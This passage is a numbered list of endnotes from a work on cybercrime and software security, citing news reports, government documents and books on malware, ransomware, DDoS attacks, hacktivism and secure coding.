31. Gendar, Alison. “Anthony Digati arrested for allegedly threatening New York Life with email spam attack.” March 8, 2010. Accessed August 10, 2020, from www.nydailynews.com/news/money/anthony-digati-arrested-allegedly-threatening-new-york-life-email-spam-attack-article-1.173739.
32. Wlasuk, Alan. “Cyber-Extortion—Huge Profits, Low Risk.” Security Week. July 13, 2012. Accessed August 10, 2020, from www.securityweek.com/cyber-extortion-huge-profits-low-risk.
33. Leger, Donna Leinwand, and Johnson, Kevin. “Federal Agents Knock Down Zeus Botnet, CryptoLocker.” USA Today. June 2, 2014. Accessed August 11, 2020, from www.usatoday.com/story/news/nation/2014/06/02/global-cyber-fraud/9863977/.
34. Fruhlinger, Josh. “What Is WannaCry Ransomware, How Does It Infect, and Who Was Responsible?” CSO Online. August 30, 2018. Accessed August 10, 2020, from www.csoonline.com/article/3227906/what-is-wannacry-ransomware-how-does-it-infect-and-who-was-responsible.html.
35. FBI Internet Crime Complaint Center. “2019 Internet Crime Report.” Accessed August 11, 2020, from https://pdf.ic3.gov/2019_IC3Report.pdf.
36. Bridis, Ted. “British Authorities Arrest Hacker Wanted as Fluffi Bunni.” April 29, 2003. Accessed August 10, 2020, from www.securityfocus.com/news/4320.
37. Costello, Sam. “Attrition.org Stops Mirroring Web Site Defacements.” ComputerWorld Online. May 22, 2001. Accessed August 10, 2020, from www.computerworld.com/article/2582627/attrition-org-stops-mirroring-web-site-defacements.html.
38. Infoshop News. “Fighting the Fascists Using Direct Action Hacktivism.” March 28, 2010. Accessed May 24, 2016, from www.anarchistnews.org/content/fighting-fascists-using-direct-action-hacktivism.
39. Denning, Dorothy E. “Activism, Hacktivism, and Cyberterrorism: The Internet as a Tool for Influencing Foreign Policy.” Info War Online. February 4, 2000. Accessed August 10, 2020, from www.iwar.org.uk/cyberterror/resources/denning.htm.
40. Elmusharaf, M. “Cyber Terrorism: The New Kind of Terrorism.” Computer Crime Research Center Online. April 8, 2004. Accessed August 10, 2020, from www.crime-research.org/articles/Cyber_Terrorism_new_kind_Terrorism.
41. Lemos, R. “Assault on Net Servers Fails.” C|Net News.com. October 22, 2002. Accessed August 10, 2020, from www.cnet.com/news/assault-on-net-servers-fails/.
42. Messmer, Ellen. “U.S. Cyber Counterattack: Bomb ’Em One Way or the Other.” February 8, 2007. Accessed August 10, 2020, from www.networkworld.com/article/2294945/u-s--cyber-counterattack--bomb--em-one-way-or-the-other.html.
43. Perlroth, Nicole, and Sanger, David. “Cyberattacks Seem Meant to Destroy, Not Just Disrupt.” March 28, 2013. Accessed August 11, 2020, from www.nytimes.com/2013/03/29/technology/corporate-cyberattackers-possibly-state-backed-now-seek-to-destroy-data.html.
44. Ibid.
45. Redwine, Samuel T., Jr. (Editor). Software Assurance: A Guide to the Common Body of Knowledge to Produce, Acquire, and Sustain Secure Software. Version 1.1. U.S. Department of Homeland Security. September 2006.
46. Ibid.
47. Strickland, Jonathon. “10 Worst Computer Viruses of All Time.” How Stuff Works. Accessed August 11, 2020, from http://computer.howstuffworks.com/worst-computer-viruses2.htm#page=1.
48. Rochford, Louisa. “The Worst Computer Viruses in History.” CEO Today. Accessed August 11, 2020, from www.ceotodaymagazine.com/2019/06/the-worst-computer-viruses-in-history.
49. Weinberger, Sharon. “Top Ten Most-Destructive Computer Viruses.” Smithsonian. Accessed August 11, 2020, from www.smithsonianmag.com/science-nature/top-ten-most-destructive-computer-viruses-159542266.
50. U.S. Department of Justice Press Release. “Creator of Melissa Computer Virus Sentenced to 20 Months in Federal Prison.” Accessed August 11, 2020, from www.justice.gov/archive/criminal/cybercrime/press-releases/2002/melissaSent.htm.
51. Kehoe, Brendan P. Zen and the Art of the Internet, 1st Edition. January 1992. Accessed August 11, 2020, from https://legacy.cs.indiana.edu/docproject/zen/zen-1.0_10.html#SEC91.
52. TruSecure. “TruSecure Successfully Defends Customers Against Goner Virus.” TruSecure Online. December 18, 2001. Accessed May 24, 2016, from www.thefreelibrary.com/TruSecure+Successfully+Defends+Customers+Against+Goner+Virus.-a080877835.
53. McCarthy, Jack. “Blaster Worm Author Gets Jail Time.” InfoWorld. January 28, 2005. Accessed August 11, 2020, from www.infoworld.com/t/business/blaster-worm-author-gets-jail-time-441.
54. Jones, Les. “GoodTimes Virus Hoax Frequently Asked Questions.” December 12, 1998. Accessed August 11, 2020, from http://fgouget.free.fr/goodtimes/goodtimes.html.
55. SANS Institute. “Glossary of Security Terms.” SANS Institute Online. Accessed August 11, 2020, from www.sans.org/security-resources/glossary-of-terms/.
56. SANS Institute. “Consensus Roadmap for Defeating Distributed Denial of Service Attacks: A Project of the Partnership for Critical Infrastructure Security.” SANS Institute Online. February 23, 2000. Accessed August 11, 2020, from www.sans.org/dosstep/roadmap.
57. Trend Micro. WORM_MYDOOM.A. Accessed May 24, 2016, from www.trendmicro.com/vinfo/us/threat-encyclopedia/archive/malware/worm_mydoom.a.
58. Richtel, Matt. “Canada Arrests 15-Year-Old In Web Attack.” The New York Times. April 20, 2000.
59. “How CloudNine Wound Up in Hell.” Wired Online. February 1, 2002. Accessed August 11, 2020, from www.wired.com/2002/02/how-cloudnine-wound-up-in-hell/.
60. Korolov, M. “Last Week’s DDoS Against the BBC May Have Been the Largest in History.” CSO Online. Accessed August 11, 2020, from www.csoonline.com/article/3020292/cyber-attacks-espionage/ddos-attack-on-bbc-may-have-been-biggest-in-history.html.
61. O’Brien, Sara Ashley. “Widespread Cyberattack Takes Down Sites Worldwide.” CNN Business. October 21, 2016. Accessed August 11, 2020, from https://money.cnn.com/2016/10/21/technology/ddos-attack-popular-sites/index.html.
62. Pearce, James. “Security Expert Warns of MP3 Danger.” ZDNet News Online. March 18, 2002. Accessed August 12, 2020, from www.zdnet.com/article/security-expert-warns-of-mp3-danger/.
63. “Murphy’s Laws Site.” Accessed August 12, 2020, from www.murphys-laws.com/.
64. Wolfe, Alexander. “Intel Preps Plan to Bust Bugs in Pentium MPUs.” Electronic Engineering Times, no. 960 (June 1997): 1.
65. Taylor, Roger. “Intel to Launch New Chip Despite Bug Reports.” Financial Times (London), no. 25 (June 1998): 52.
66. OWASP. “Top 10 Web Application Security Risks.” Accessed August 12, 2020, from https://owasp.org/www-project-top-ten/.
67. Howard, M., LeBlanc, D., and Viega, J. 24 Deadly Sins of Software Security: Programming Flaws and How to Fix Them. 2010. New York: McGraw-Hill/Osborne.
68. Spanbauer, Scott. “Pentium Bug, Meet the IE 4.0 Flaw.” PC World 16, no. 2 (February 1998): 55.
69. Brumley, D., Tzi-cker, C., Johnson, R., Lin, H., and Song, D. “RICH: Automatically Protecting Against Integer-Based Vulnerabilities.” Accessed August 12, 2020, from https://sites.cs.ucsb.edu/~rachel.lin/papers/Rich.pdf.
70. Howard, M., LeBlanc, D., and Viega, J. 24 Deadly Sins of Software Security: Programming Flaws and How to Fix Them. 2010. New York: McGraw-Hill/Osborne.
